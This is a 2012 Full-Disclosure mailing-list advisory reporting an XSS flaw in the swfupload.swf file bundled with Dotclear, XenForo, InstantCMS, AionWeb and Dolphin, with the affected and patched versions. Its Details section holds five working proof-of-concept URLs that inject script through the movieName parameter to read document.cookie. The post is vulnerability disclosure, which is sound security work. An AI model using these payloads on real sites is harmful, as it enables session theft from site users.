Hello list!

I will draw your attention to XSS vulnerability in other web applications 
with swfupload. Earlier I've wrote about swfupload in WordPress 
(CVE-2012-3414) and that this hole is available in many web applications.

In previous letter I've wrote the information about different versions of 
this swf-file (with different names) and all versions of WordPress, which 
contain any of these swf-files. And here is information about Dotclear, 
XenForo, InstantCMS, AionWeb, Dolphin - among multiple web applications 
which are bundled with swfupload.swf.

-------------------------
Affected products:
-------------------------

Vulnerable are potentially all versions of Dotclear, InstantCMS, AionWeb, 
Dolphin. There is no information that they have fixed this vulnerability in 
their software (at that this vulnerability was fixed in WordPress 3.3.2 at 
20.04.2012).

Vulnerable are versions XenForo 1.0.0 - 1.1.2. In XenForo 1.1.3 this 
vulnerability was fixed and patch was released for previous versions 
(already at 19.06.2012).

The developers of WordPress released new version of flash file (the same did 
the developers of XenForo), which could be used by all web developers, which 
were using swfupload.

----------
Details:
----------

XSS (WASC-08):

Dotclear:

http://site/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

XenForo:

http://site/js/swfupload/Flash/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

InstantCMS:

http://site/includes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

AionWeb:

http://site/engine/classes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Dolphin:

http://site/plugins/swfupload/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Swfupload is used in WordPress, plugins for WP and in other web 
applications. There are many web applications with it, not as many as those 
which are using JW Player (http://securityvulns.com/docs28176.html) and JW 
Player Pro (http://securityvulns.com/docs28483.html) (vulnerabilities in 
them I've disclosed earlier), but still a lot of.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Reply via email to